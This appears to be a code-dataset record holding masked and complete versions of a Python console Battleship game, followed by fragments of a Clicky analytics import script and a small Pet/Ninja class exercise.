"step-2": "<mask token>\n\n\ndef check_ok(boat, taken_positions):\n boat.sort()\n for i in range(len(boat)):\n if boat[i] in taken_positions:\n boat = [-1]\n break\n elif boat[i] > 99 or boat[i] < 0:\n boat = [-1]\n break\n elif boat[i] % 10 == 9 and i < len(boat) - 1:\n if boat[i + 1] % 10 == 0:\n boat = [-1]\n break\n if i != 0:\n if boat[i] != boat[i - 1] + 1 and boat[i] != boat[i - 1] + 10:\n boat = [-1]\n break\n return boat\n\n\ndef check_shot(shot, ships, hit, miss, comp, sinked_boats):\n cond = 0\n for i in range(len(ships)):\n if shot in ships[i]:\n ships[i].remove(shot)\n if len(ships[i]) > 0:\n hit.append(shot)\n cond = 1\n else:\n comp.append(shot)\n cond = 2\n sinked_boats += 1\n if cond == 0:\n miss.append(shot)\n return ships, hit, miss, comp, cond, sinked_boats\n\n\ndef create_playground(hit, miss, comp):\n print(' battleship')\n print(' 0 1 2 3 4 5 6 7 8 9')\n block = 0\n for i in range(10):\n row = ''\n for j in range(10):\n character = '_ '\n if block in miss:\n character = 'x '\n elif block in hit:\n character = 'o '\n elif block in comp:\n character = 'Q '\n row += character\n block += 1\n print(i, ' ', row)\n print('')\n\n\ndef check_empty(ships):\n return all([(not elem) for elem in ships])\n\n\n<mask token>\n\n\ndef create_ships_u(taken_positions, num_boats):\n ships = []\n for len_of_boat in num_boats:\n ship, taken_positions = get_ship(len_of_boat, taken_positions)\n ships.append(ship)\n return ships, taken_positions\n\n\n<mask token>\n\n\ndef get_shot_user(guesses):\n while True:\n try:\n shot = int(input('Enter your shot: '))\n if shot < 0 or shot > 99:\n shot = int(input('Enter your shot:'))\n elif shot in guesses:\n print('already guessed - please enter again')\n else:\n return shot\n except:\n print('incorrect - please enter integer only')\n\n\n<mask token>\n\n\ndef create_ships_c(taken_positions, num_boats):\n ships = []\n for len_of_boat in num_boats:\n boat_position = [-1]\n while -1 in boat_position:\n boat_start = randrange(99)\n boat_direction = randrange(1, 4)\n boat_position = create_boat(len_of_boat, boat_start,\n boat_direction, taken_positions)\n ships.append(boat_position)\n taken_positions += boat_position\n return ships, taken_positions\n\n\ndef create_boat(len_of_boat, boat_start, boat_direction, taken_positions):\n boat = []\n if boat_direction == 1:\n for i in range(len_of_boat):\n boat.append(boat_start - i * 10)\n boat = check_ok(boat, taken_positions)\n elif boat_direction == 2:\n for i in range(len_of_boat):\n boat.append(boat_start + i)\n boat = check_ok(boat, taken_positions)\n elif boat_direction == 3:\n for i in range(len_of_boat):\n boat.append(boat_start + i * 10)\n boat = check_ok(boat, taken_positions)\n elif boat_direction == 4:\n for i in range(len_of_boat):\n boat.append(boat_start - i)\n boat = check_ok(boat, taken_positions)\n return boat\n\n\ndef get_shot_comp(guesses, tactics):\n while True:\n try:\n if len(tactics) > 0:\n shot = tactics[0]\n else:\n shot = randrange(99)\n if shot not in guesses:\n guesses.append(shot)\n break\n except:\n print('incorrect - please enter integer only')\n return shot, guesses\n\n\ndef calculate_tactics(shot, tactics, guesses, hit):\n temp = []\n if len(tactics) < 1:\n temp = [shot - 1, shot + 1, shot - 10, shot + 10]\n elif shot - 1 in hit:\n temp = [shot + 1]\n for num in [2, 3, 4, 5, 6, 7, 8]:\n if shot - num not in hit:\n temp.append(shot - num)\n break\n elif shot + 1 in hit:\n temp = [shot - 1]\n for num in [2, 3, 4, 5, 6, 7, 8]:\n if shot + num not in hit:\n temp.append(shot + num)\n 
break\n elif shot - 10 in hit:\n temp = [shot + 10]\n for num in [20, 30, 40, 50, 60, 70, 80]:\n if shot - num not in hit:\n temp.append(shot - num)\n break\n elif shot + 10 in hit:\n temp = [shot - 10]\n for num in [20, 30, 40, 50, 60, 70, 80]:\n if shot + num not in hit:\n temp.append(shot + num)\n break\n candidate = []\n for i in range(len(temp)):\n if temp[i] not in guesses and temp[i] < 100 and temp[i] > -1:\n candidate.append(temp[i])\n random.shuffle(candidate)\n return candidate\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef check_ok(boat, taken_positions):\n boat.sort()\n for i in range(len(boat)):\n if boat[i] in taken_positions:\n boat = [-1]\n break\n elif boat[i] > 99 or boat[i] < 0:\n boat = [-1]\n break\n elif boat[i] % 10 == 9 and i < len(boat) - 1:\n if boat[i + 1] % 10 == 0:\n boat = [-1]\n break\n if i != 0:\n if boat[i] != boat[i - 1] + 1 and boat[i] != boat[i - 1] + 10:\n boat = [-1]\n break\n return boat\n\n\ndef check_shot(shot, ships, hit, miss, comp, sinked_boats):\n cond = 0\n for i in range(len(ships)):\n if shot in ships[i]:\n ships[i].remove(shot)\n if len(ships[i]) > 0:\n hit.append(shot)\n cond = 1\n else:\n comp.append(shot)\n cond = 2\n sinked_boats += 1\n if cond == 0:\n miss.append(shot)\n return ships, hit, miss, comp, cond, sinked_boats\n\n\ndef create_playground(hit, miss, comp):\n print(' battleship')\n print(' 0 1 2 3 4 5 6 7 8 9')\n block = 0\n for i in range(10):\n row = ''\n for j in range(10):\n character = '_ '\n if block in miss:\n character = 'x '\n elif block in hit:\n character = 'o '\n elif block in comp:\n character = 'Q '\n row += character\n block += 1\n print(i, ' ', row)\n print('')\n\n\ndef check_empty(ships):\n return all([(not elem) for elem in ships])\n\n\n<mask token>\n\n\ndef create_ships_u(taken_positions, num_boats):\n ships = []\n for len_of_boat in num_boats:\n ship, taken_positions = get_ship(len_of_boat, taken_positions)\n ships.append(ship)\n return ships, taken_positions\n\n\n<mask token>\n\n\ndef get_ship(len_of_boat, taken_positions):\n while True:\n ship = []\n print('enter your ship of length', len_of_boat)\n for i in range(len_of_boat):\n while True:\n try:\n boat_num = input('please enter a number: ')\n ship.append(int(boat_num))\n except ValueError:\n print('wrong type of input')\n continue\n else:\n break\n ship = check_ok(ship, taken_positions)\n if -1 not in ship:\n taken_positions += ship\n break\n else:\n print('invalid number - please enter again')\n return ship, taken_positions\n\n\ndef get_shot_user(guesses):\n while True:\n try:\n shot = int(input('Enter your shot: '))\n if shot < 0 or shot > 99:\n shot = int(input('Enter your shot:'))\n elif shot in guesses:\n print('already guessed - please enter again')\n else:\n return shot\n except:\n print('incorrect - please enter integer only')\n\n\n<mask token>\n\n\ndef create_ships_c(taken_positions, num_boats):\n ships = []\n for len_of_boat in num_boats:\n boat_position = [-1]\n while -1 in boat_position:\n boat_start = randrange(99)\n boat_direction = randrange(1, 4)\n boat_position = create_boat(len_of_boat, boat_start,\n boat_direction, taken_positions)\n ships.append(boat_position)\n taken_positions += boat_position\n return ships, taken_positions\n\n\ndef create_boat(len_of_boat, boat_start, boat_direction, taken_positions):\n boat = []\n if boat_direction == 1:\n for i in range(len_of_boat):\n boat.append(boat_start - i * 10)\n boat = check_ok(boat, taken_positions)\n elif boat_direction == 2:\n for i in range(len_of_boat):\n boat.append(boat_start + i)\n boat = check_ok(boat, taken_positions)\n elif boat_direction == 3:\n for i in range(len_of_boat):\n boat.append(boat_start + i * 10)\n boat = check_ok(boat, taken_positions)\n elif boat_direction == 4:\n for i in range(len_of_boat):\n boat.append(boat_start - i)\n boat = check_ok(boat, taken_positions)\n return boat\n\n\ndef get_shot_comp(guesses, tactics):\n while True:\n try:\n if len(tactics) > 0:\n shot = tactics[0]\n else:\n shot = randrange(99)\n if shot not in guesses:\n guesses.append(shot)\n 
break\n except:\n print('incorrect - please enter integer only')\n return shot, guesses\n\n\ndef calculate_tactics(shot, tactics, guesses, hit):\n temp = []\n if len(tactics) < 1:\n temp = [shot - 1, shot + 1, shot - 10, shot + 10]\n elif shot - 1 in hit:\n temp = [shot + 1]\n for num in [2, 3, 4, 5, 6, 7, 8]:\n if shot - num not in hit:\n temp.append(shot - num)\n break\n elif shot + 1 in hit:\n temp = [shot - 1]\n for num in [2, 3, 4, 5, 6, 7, 8]:\n if shot + num not in hit:\n temp.append(shot + num)\n break\n elif shot - 10 in hit:\n temp = [shot + 10]\n for num in [20, 30, 40, 50, 60, 70, 80]:\n if shot - num not in hit:\n temp.append(shot - num)\n break\n elif shot + 10 in hit:\n temp = [shot - 10]\n for num in [20, 30, 40, 50, 60, 70, 80]:\n if shot + num not in hit:\n temp.append(shot + num)\n break\n candidate = []\n for i in range(len(temp)):\n if temp[i] not in guesses and temp[i] < 100 and temp[i] > -1:\n candidate.append(temp[i])\n random.shuffle(candidate)\n return candidate\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef check_ok(boat, taken_positions):\n boat.sort()\n for i in range(len(boat)):\n if boat[i] in taken_positions:\n boat = [-1]\n break\n elif boat[i] > 99 or boat[i] < 0:\n boat = [-1]\n break\n elif boat[i] % 10 == 9 and i < len(boat) - 1:\n if boat[i + 1] % 10 == 0:\n boat = [-1]\n break\n if i != 0:\n if boat[i] != boat[i - 1] + 1 and boat[i] != boat[i - 1] + 10:\n boat = [-1]\n break\n return boat\n\n\ndef check_shot(shot, ships, hit, miss, comp, sinked_boats):\n cond = 0\n for i in range(len(ships)):\n if shot in ships[i]:\n ships[i].remove(shot)\n if len(ships[i]) > 0:\n hit.append(shot)\n cond = 1\n else:\n comp.append(shot)\n cond = 2\n sinked_boats += 1\n if cond == 0:\n miss.append(shot)\n return ships, hit, miss, comp, cond, sinked_boats\n\n\ndef create_playground(hit, miss, comp):\n print(' battleship')\n print(' 0 1 2 3 4 5 6 7 8 9')\n block = 0\n for i in range(10):\n row = ''\n for j in range(10):\n character = '_ '\n if block in miss:\n character = 'x '\n elif block in hit:\n character = 'o '\n elif block in comp:\n character = 'Q '\n row += character\n block += 1\n print(i, ' ', row)\n print('')\n\n\ndef check_empty(ships):\n return all([(not elem) for elem in ships])\n\n\n<mask token>\n\n\ndef create_ships_u(taken_positions, num_boats):\n ships = []\n for len_of_boat in num_boats:\n ship, taken_positions = get_ship(len_of_boat, taken_positions)\n ships.append(ship)\n return ships, taken_positions\n\n\ndef create_playground_u(taken_positions):\n print(' battleships ')\n print(' 0 1 2 3 4 5 6 7 8 9')\n place = 0\n for x in range(10):\n row = ''\n for y in range(10):\n ch = ' _ '\n if place in taken_positions:\n ch = ' o '\n row = row + ch\n place = place + 1\n print(x, ' ', row)\n\n\ndef get_ship(len_of_boat, taken_positions):\n while True:\n ship = []\n print('enter your ship of length', len_of_boat)\n for i in range(len_of_boat):\n while True:\n try:\n boat_num = input('please enter a number: ')\n ship.append(int(boat_num))\n except ValueError:\n print('wrong type of input')\n continue\n else:\n break\n ship = check_ok(ship, taken_positions)\n if -1 not in ship:\n taken_positions += ship\n break\n else:\n print('invalid number - please enter again')\n return ship, taken_positions\n\n\ndef get_shot_user(guesses):\n while True:\n try:\n shot = int(input('Enter your shot: '))\n if shot < 0 or shot > 99:\n shot = int(input('Enter your shot:'))\n elif shot in guesses:\n print('already guessed - please enter again')\n else:\n return shot\n except:\n print('incorrect - please enter integer only')\n\n\n<mask token>\n\n\ndef create_ships_c(taken_positions, num_boats):\n ships = []\n for len_of_boat in num_boats:\n boat_position = [-1]\n while -1 in boat_position:\n boat_start = randrange(99)\n boat_direction = randrange(1, 4)\n boat_position = create_boat(len_of_boat, boat_start,\n boat_direction, taken_positions)\n ships.append(boat_position)\n taken_positions += boat_position\n return ships, taken_positions\n\n\ndef create_boat(len_of_boat, boat_start, boat_direction, taken_positions):\n boat = []\n if boat_direction == 1:\n for i in range(len_of_boat):\n boat.append(boat_start - i * 10)\n boat = check_ok(boat, taken_positions)\n elif boat_direction == 2:\n for i in range(len_of_boat):\n boat.append(boat_start + i)\n boat = check_ok(boat, taken_positions)\n elif boat_direction == 3:\n for i in range(len_of_boat):\n boat.append(boat_start + i * 10)\n boat = check_ok(boat, taken_positions)\n elif boat_direction == 4:\n for i in range(len_of_boat):\n 
boat.append(boat_start - i)\n boat = check_ok(boat, taken_positions)\n return boat\n\n\ndef get_shot_comp(guesses, tactics):\n while True:\n try:\n if len(tactics) > 0:\n shot = tactics[0]\n else:\n shot = randrange(99)\n if shot not in guesses:\n guesses.append(shot)\n break\n except:\n print('incorrect - please enter integer only')\n return shot, guesses\n\n\ndef calculate_tactics(shot, tactics, guesses, hit):\n temp = []\n if len(tactics) < 1:\n temp = [shot - 1, shot + 1, shot - 10, shot + 10]\n elif shot - 1 in hit:\n temp = [shot + 1]\n for num in [2, 3, 4, 5, 6, 7, 8]:\n if shot - num not in hit:\n temp.append(shot - num)\n break\n elif shot + 1 in hit:\n temp = [shot - 1]\n for num in [2, 3, 4, 5, 6, 7, 8]:\n if shot + num not in hit:\n temp.append(shot + num)\n break\n elif shot - 10 in hit:\n temp = [shot + 10]\n for num in [20, 30, 40, 50, 60, 70, 80]:\n if shot - num not in hit:\n temp.append(shot - num)\n break\n elif shot + 10 in hit:\n temp = [shot - 10]\n for num in [20, 30, 40, 50, 60, 70, 80]:\n if shot + num not in hit:\n temp.append(shot + num)\n break\n candidate = []\n for i in range(len(temp)):\n if temp[i] not in guesses and temp[i] < 100 and temp[i] > -1:\n candidate.append(temp[i])\n random.shuffle(candidate)\n return candidate\n\n\n<mask token>\n",
"step-5": "from random import randrange\r\nimport random\r\n\r\n\"\"\"\r\nboth user and computer funcs:\r\n\"\"\"\r\ndef check_ok(boat, taken_positions):\r\n# input: boat, taken_positions \r\n# this func checks if the boat outside the playground or the position of the boat is already in taken_position\r\n# return: boat. boat will returned as [-1] or its specific position\r\n boat.sort()\r\n for i in range(len(boat)):\r\n if boat[i] in taken_positions:\r\n #this condition checks if the block boat[i] is already in the list taken_positions\r\n boat = [-1]\r\n break \r\n elif boat[i] > 99 or boat[i] < 0:\r\n #this condition checks border 1 and 3\r\n boat = [-1]\r\n break\r\n elif boat[i] % 10 == 9 and i < len(boat) - 1:\r\n #this condition checks border 2 and 4\r\n if boat[i + 1] % 10 == 0:\r\n boat = [-1]\r\n break\r\n \r\n if i != 0:\r\n # this condition checks if there is any hole in the boat\r\n if boat[i] != boat[i - 1] + 1 and boat[i] != boat[i - 1] + 10:\r\n boat = [-1]\r\n break\r\n return boat \r\n\r\n\r\ndef check_shot(shot, ships, hit, miss, comp, sinked_boats):\r\n# input: shot, all the boats (ships), hit, miss, comp, sinked_boats\r\n# this func initially assumes that the shot is missed (cond = 0)\r\n# given a shot, this func uses a for-loop that goes through all ships to see if the shot hits one of the ships \r\n# if yes, remove the block of the boat that is hitted by the shot\r\n# append the shot to hit or comp. If comp, sinked_boats += 1\r\n# if not, append the shot to miss\r\n# return: all the boats (ships), hit, miss, comp, cond, sinked_boats\r\n cond = 0 # miss\r\n for i in range(len(ships)):\r\n if shot in ships[i]:\r\n ships[i].remove(shot)\r\n if len(ships[i]) > 0:\r\n hit.append(shot)\r\n cond = 1 # hit\r\n else:\r\n comp.append(shot)\r\n cond = 2 # comp\r\n sinked_boats += 1 \r\n if cond == 0: # miss\r\n miss.append(shot) \r\n return ships, hit, miss, comp, cond, sinked_boats\r\n\r\n\r\ndef create_playground(hit, miss, comp):\r\n# input: hit, miss, comp\r\n# this func creates the playground with the status of each block \r\n# print the playground\r\n print(\" battleship\")\r\n print(\" 0 1 2 3 4 5 6 7 8 9\")\r\n \r\n block = 0 #this variable keep track of the spot of the block\r\n for i in range(10):\r\n #create each row\r\n row = \"\"\r\n for j in range(10):\r\n #create each spot on the specific row\r\n character = \"_ \"\r\n if block in miss:\r\n character = \"x \"\r\n elif block in hit:\r\n character = \"o \" \r\n elif block in comp:\r\n character = \"Q \"\r\n row += character\r\n block += 1 #the block var increments 1 after each character is add to row\r\n print(i, \" \", row)\r\n print(\"\")\r\n\r\n\r\ndef check_empty(ships):\r\n# input: ships\r\n# [] = False, [#have element] = True\r\n# this func checks each ship in the 2D list ships\r\n# if ship is empty, return True, and vice versa\r\n# if all ships are empty, return True, else return False\r\n# return True or False \r\n return all([not elem for elem in ships])\r\n\r\n\r\n\"\"\"\r\nuser - 2 funcs:\r\n\"\"\"\r\ndef create_ships_u(taken_positions, num_boats):\r\n# input: num_boats\r\n# this func has a loop that makes all boats,\r\n# which calls the get_ship(len_of_boat, taken_positions) that creates a single boat\r\n# return: ships, which are the 2D list has len(num_boats) that contains the positions of all boats\r\n ships = [] #this is a 2D list contains the positions of all boats\r\n for len_of_boat in num_boats:\r\n ship, taken_positions = get_ship(len_of_boat, taken_positions)\r\n ships.append(ship)\r\n return 
ships, taken_positions\r\n\r\n \r\ndef create_playground_u(taken_positions):\r\n print(\" battleships \")\r\n print(\" 0 1 2 3 4 5 6 7 8 9\")\r\n \r\n place = 0\r\n for x in range(10):\r\n row = \"\"\r\n for y in range(10):\r\n ch = \" _ \"\r\n if place in taken_positions:\r\n ch = \" o \" \r\n row = row + ch\r\n place = place + 1\r\n \r\n print(x,\" \",row)\r\n\r\n\r\ndef get_ship(len_of_boat, taken_positions):\r\n# input: len_of_boat, taken_positions\r\n# this func gets the boat's position from the user's input\r\n# this func checks both the type of the input(is it int) and if the boat is inside playground/in taken_positions/in correct order \r\n# return a valid ship \r\n while True:\r\n ship = []\r\n print(\"enter your ship of length\", len_of_boat)\r\n for i in range(len_of_boat):\r\n while True:\r\n try:\r\n boat_num = input(\"please enter a number: \")\r\n ship.append(int(boat_num))\r\n except ValueError: # better try again... Return to the start of the loop\r\n print(\"wrong type of input\")\r\n continue\r\n else: # is is a correct input, and we're ready to exit the loop\r\n break\r\n ship = check_ok(ship, taken_positions)\r\n\r\n if -1 not in ship: # check if a ship is valid. If yes, add the ship to taken_positions and break\r\n taken_positions += ship\r\n break\r\n else:\r\n print(\"invalid number - please enter again\")\r\n return ship, taken_positions\r\n\r\n\r\ndef get_shot_user(guesses):\r\n# input: guesses is the combined list of hit, miss, comp\r\n# this funcs asks the user to enter the shot, then checks the validity of the shot \r\n# return: the valid shot\r\n while True:\r\n try:\r\n shot = int(input(\"Enter your shot: \"))\r\n if shot < 0 or shot > 99:\r\n shot = int(input(\"Enter your shot:\"))\r\n elif shot in guesses:\r\n print(\"already guessed - please enter again\")\r\n else:\r\n return shot\r\n except:\r\n print(\"incorrect - please enter integer only\")\r\n\r\n\r\n\"\"\"\r\ncomputer - 1 funcs:\r\n\"\"\"\r\ndef create_ships_c(taken_positions, num_boats):\r\n# input: num_boats\r\n# this funcs has a loop that makes all boats,\r\n# which calls the create_boat() that creates a single boat\r\n# return: ships, which are the 2D list has len(num_boats) that contains the positions of all boats\r\n ships = [] #this is a 2D list contains the positions of all boats\r\n for len_of_boat in num_boats:\r\n boat_position = [-1] #create the initial position of every boat is [-1]\r\n while -1 in boat_position:\r\n boat_start = randrange(99) #boat starting point\r\n boat_direction = randrange(1, 4) #{1: \"up\", 2: \"right\", 3: \"down\", 4: \"left\"}\r\n boat_position = create_boat(len_of_boat, boat_start, boat_direction, taken_positions) #return the position of boat\r\n #a new boat is created after finishing the while loop\r\n ships.append(boat_position)\r\n taken_positions += boat_position #add all positions of the newly created boat to the list taken_positions\r\n return ships, taken_positions\r\n\r\n\r\ndef create_boat(len_of_boat, boat_start, boat_direction, taken_positions):\r\n# input: len_of_boat, boat_start, boat_direction, taken_positions\r\n# this func initializes boat = []\r\n# with len_of_boat, boat_start, boat_direction, this func create the position of the boat\r\n# calls check_ok(boat, taken_positions) to see if the boat outside playground or the position of the boat is already in taken_position\r\n# return: boat. 
boat will returned as [-1] or its specific position\r\n boat = []\r\n if boat_direction == 1:\r\n for i in range(len_of_boat):\r\n boat.append(boat_start - i * 10) # already have the position of boat after this line\r\n boat = check_ok(boat, taken_positions)\r\n elif boat_direction == 2:\r\n for i in range(len_of_boat):\r\n boat.append(boat_start + i)\r\n boat = check_ok(boat, taken_positions)\r\n elif boat_direction == 3:\r\n for i in range(len_of_boat):\r\n boat.append(boat_start + i * 10)\r\n boat = check_ok(boat, taken_positions)\r\n elif boat_direction == 4:\r\n for i in range(len_of_boat):\r\n boat.append(boat_start - i)\r\n boat = check_ok(boat, taken_positions)\r\n return boat\r\n\r\n\r\ndef get_shot_comp(guesses, tactics):\r\n# input: guesses (all moves), tactics(which is the list of all valid possible moves for the shot)\r\n# in the first mơve, tactics = []\r\n# this func checks if len(tactics) > 0\r\n# if yes, pick shot = tactics[0]\r\n# if no, pick shot = randrange(99)\r\n# this func check if shot not in guesses(which is the list of all moves) \r\n# if yes, guess.append(shot), and break\r\n# return: the valid shot, guesses\r\n while True:\r\n try:\r\n if len(tactics) > 0:\r\n shot = tactics[0]\r\n else:\r\n shot = randrange(99)\r\n \r\n if shot not in guesses:\r\n guesses.append(shot)\r\n break\r\n except:\r\n print(\"incorrect - please enter integer only\")\r\n return shot, guesses\r\n\r\n\r\ndef calculate_tactics(shot, tactics, guesses, hit):\r\n# input: shot, tactics, guesses, hit\r\n# this function takes the newly shot, and changes the tactics list accordingly\r\n# the list temp is the possible positions that the next shot can be\r\n# if the shot hits the first time, len(tactics) = 0. Then, temp is the list contains 4 blocks around the shot\r\n# else, the list temp will be created based on the last 2 shots\r\n# candidate is the list of valid possible shots that is created from temp\r\n# shuffle the order of elements inside candidate\r\n# return: candidate (candidate is tactics)\r\n temp = []\r\n if len(tactics) < 1:\r\n # got 1 hit the first time \r\n temp = [shot - 1, shot + 1, shot - 10, shot + 10] # temporary places that the next shot could be \r\n else: \r\n # got at least 2 hits \r\n # checks to see if the 4 spots around is in hit\r\n if shot - 1 in hit: # east\r\n temp = [shot + 1]\r\n for num in [2, 3, 4, 5, 6, 7, 8]:\r\n if shot - num not in hit:\r\n temp.append(shot - num) \r\n break\r\n\r\n elif shot + 1 in hit: # west\r\n temp = [shot - 1]\r\n for num in [2, 3, 4, 5, 6, 7, 8]:\r\n if shot + num not in hit:\r\n temp.append(shot + num) \r\n break\r\n \r\n elif shot - 10 in hit: # south\r\n temp = [shot + 10]\r\n for num in [20, 30, 40, 50, 60, 70, 80]:\r\n if shot - num not in hit:\r\n temp.append(shot - num) \r\n break\r\n \r\n elif shot + 10 in hit: # north. Ex: first shot is 50, next shot is 40\r\n temp = [shot - 10]\r\n for num in [20, 30, 40, 50, 60, 70, 80]:\r\n if shot + num not in hit:\r\n temp.append(shot + num) \r\n break\r\n \r\n candidate = [] # list of valid places that the next shot could be\r\n for i in range(len(temp)):\r\n if temp[i] not in guesses and temp[i] < 100 and temp[i] > -1: #checks the validity of places in temp\r\n candidate.append(temp[i])\r\n random.shuffle(candidate) # shuffle the element order of the list candidate\r\n return candidate\r\n\r\n\r\n\r\n\"\"\"\r\nmain program:\r\n\"\"\"\r\nnum_boats = [5, 4, 3, 3, 2, 2] # this list contains all boats. 
Each boat is represented by its length \r\n\r\n# before game\r\n# computer - 1\r\nhit1 = []\r\nmiss1 = []\r\ncomp1 = []\r\nguesses1 = []\r\ncond1 = 0\r\ntactics1 = [] # list of possible moves after a boat is hitted. After a boat is sunked, tactics reset to []\r\ntaken_positions1 = []\r\nsinked_boats1 = []\r\n\r\n# user - 2\r\nhit2 = []\r\nmiss2 = []\r\ncomp2 = []\r\nguesses2 = []\r\ncond2 = 0\r\ntactics2 = []\r\ntaken_positions2 = []\r\nsinked_boats2 = []\r\n\r\n# computer creates ships for player 1\r\nships1, taken_positions1 = create_ships_c(taken_positions1, num_boats) \r\n# user creates boat for player 2 - show board\r\nships2, taken_positions2 = create_ships_u(taken_positions2, num_boats)\r\ncreate_playground_u(taken_positions2)\r\n\r\n# loop for user and computer takes turn to shoot, and repeat until finding a winner:\r\nturns = 0\r\nwhile True: \r\n turns += 1\r\n\r\n# USER SHOOTS: using 1 because it is checking the data of computer\r\n guesses1 = hit1 + miss1 + comp1\r\n shot1 = get_shot_user(guesses1)\r\n ships1, hit1, miss1, comp1, cond1, sinked_boats1 = check_shot(shot1, ships1, hit1, miss1, comp1, sinked_boats1)\r\n create_playground(hit1, miss1, comp1)\r\n\r\n# check if all of the computer ships are empty:\r\n if check_empty(ships1):\r\n print(\"end of game - winner in\", turns)\r\n break\r\n\r\n# COMPUTER SHOOTS:\r\n guesses2 = hit2 + miss2 + comp2\r\n shot2, guesses2 = get_shot_comp(guesses2, tactics2) \r\n ships2, hit2, miss2, comp2, cond2, sinked_boats2 = check_shot(shot2, ships2, hit2, miss2, comp2, sinked_boats2)\r\n create_playground(hit2, miss2, comp2)\r\n\r\n if cond2 == 1:\r\n # got 1 hit\r\n tactics2 = calculate_tactics(shot2, tactics2, guesses2, hit2)\r\n elif cond2 == 2:\r\n # comp, and sunk the boat\r\n # reset tactics = []\r\n tactics2 = []\r\n elif len(tactics2) > 0: #len(tactics) > 0 means that there are still possible moves\r\n # got 1 hit, then miss\r\n # remove the newly shot from tactics\r\n tactics2.pop(0)\r\n # in case all 3 statements above are False, which means there is no hit in the first place, tactics is still []\r\n\r\n# check if all of the computer ships are empty:\r\n if check_empty(ships2):\r\n print(\"end of game - computer wins in\", turns)\r\n break\r\n\r\n# after both the user and computer shoot, start a new loop:\r\n\r\n",
"step-ids": [
7,
10,
11,
12,
16
]
}
|
[
7,
10,
11,
12,
16
] |
import os
import requests
import sqlite3
from models import analytics, jcanalytics
def populate():
url = 'https://api.clicky.com/api/stats/4?site_id=100716069&sitekey=93c104e29de28bd9&type=visitors-list'
date = '&date=last-30-days'
limit = '&limit=all'
output = '&output=json'
    total = url + date + limit + output
r = requests.get(total)
print(total)
data = r.json()
# html = []
for item in data[0]['dates'][0]['items']:
si = item["session_id"]
ip = item["ip_address"]
time = item["time"]
timep = item["time_pretty"]
# geol = item["geolocation"]
# org = item["organization"]
if item.has_key("geolocation"):
geol = item["geolocation"]
else:
geol = ""
if item.has_key("organization"):
org = item["organization"]
else:
org = ""
        add_entry(si, ip, org, time, timep, geol)
add_jcentry(org)
def add_entry(si,ip,org,time,timep,geol):
    entry = analytics.objects.get_or_create(si=si, ip=ip, org=org, time=time, timep=timep, geol=geol)[0]
return entry
def add_jcentry(org):
jcentry = jcanalytics.objects.get_or_create(org=org)[0]
return jcentry
print "Starting population script..."
populate()
|
normal
|
{
"blob_id": "e8226ab6be5c21335d843cba720e66646a2dee4e",
"index": 241,
"step-1": "import os\nimport requests\nimport sqlite3\nfrom models import analytics, jcanalytics\n\n\ndef populate():\n url = 'https://api.clicky.com/api/stats/4?site_id=100716069&sitekey=93c104e29de28bd9&type=visitors-list'\n date = '&date=last-30-days'\n limit = '&limit=all'\n output = '&output=json'\n total = url+date+limit+output\n r = requests.get(total)\n print(total)\n data = r.json()\n # html = []\n for item in data[0]['dates'][0]['items']:\n si = item[\"session_id\"]\n ip = item[\"ip_address\"]\n time = item[\"time\"]\n timep = item[\"time_pretty\"]\n # geol = item[\"geolocation\"]\n # org = item[\"organization\"]\n if item.has_key(\"geolocation\"):\n geol = item[\"geolocation\"]\n else:\n geol = \"\"\n if item.has_key(\"organization\"):\n org = item[\"organization\"]\n else:\n org = \"\"\n add_entry(si,ip,org,time,timep,geol)\n add_jcentry(org)\n\ndef add_entry(si,ip,org,time,timep,geol):\n entry = analytics.objects.get_or_create(si=si,ip=ip,org=org,time=time,timep=timep,geol=geol)[0]\n return entry\n\ndef add_jcentry(org):\n jcentry = jcanalytics.objects.get_or_create(org=org)[0]\n return jcentry\n\nprint \"Starting population script...\"\npopulate()\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
from pet import Pet
class Ninja:
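    # A ninja keeps a reference to a Pet and delegates walk/feed/bathe to the pet's methods.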
def __init__(self, first_name, last_name, treats, pet_food, pet):
self.first_name = first_name
self.last_name = last_name
self.treats = treats
self.pet_food = pet_food
self.pet = pet
def walk(self):
self.pet.play()
def feed(self):
self.pet.eat()
def bathe(self):
self.pet.noise()
Fox = Pet("Ninetailed Fox", "Fox", "Fire-Breathing")
Naruto = Ninja("Naruto", "Izumaki", "Rice Balls", "Ground Beef", Fox)
Naruto.feed()
print(Naruto.pet.energy)
print(Naruto.pet.health)
Naruto.bathe()
Naruto.walk()
print(Naruto.pet.energy)
print(Naruto.pet.health)
|
normal
|
{
"blob_id": "b210784a198eaa3e57b5a65ec182a746aecc0e2b",
"index": 1695,
"step-1": "<mask token>\n\n\nclass Ninja:\n\n def __init__(self, first_name, last_name, treats, pet_food, pet):\n self.first_name = first_name\n self.last_name = last_name\n self.treats = treats\n self.pet_food = pet_food\n self.pet = pet\n <mask token>\n <mask token>\n\n def bathe(self):\n self.pet.noise()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Ninja:\n\n def __init__(self, first_name, last_name, treats, pet_food, pet):\n self.first_name = first_name\n self.last_name = last_name\n self.treats = treats\n self.pet_food = pet_food\n self.pet = pet\n\n def walk(self):\n self.pet.play()\n\n def feed(self):\n self.pet.eat()\n\n def bathe(self):\n self.pet.noise()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Ninja:\n\n def __init__(self, first_name, last_name, treats, pet_food, pet):\n self.first_name = first_name\n self.last_name = last_name\n self.treats = treats\n self.pet_food = pet_food\n self.pet = pet\n\n def walk(self):\n self.pet.play()\n\n def feed(self):\n self.pet.eat()\n\n def bathe(self):\n self.pet.noise()\n\n\n<mask token>\nNaruto.feed()\nprint(Naruto.pet.energy)\nprint(Naruto.pet.health)\nNaruto.bathe()\nNaruto.walk()\nprint(Naruto.pet.energy)\nprint(Naruto.pet.health)\n",
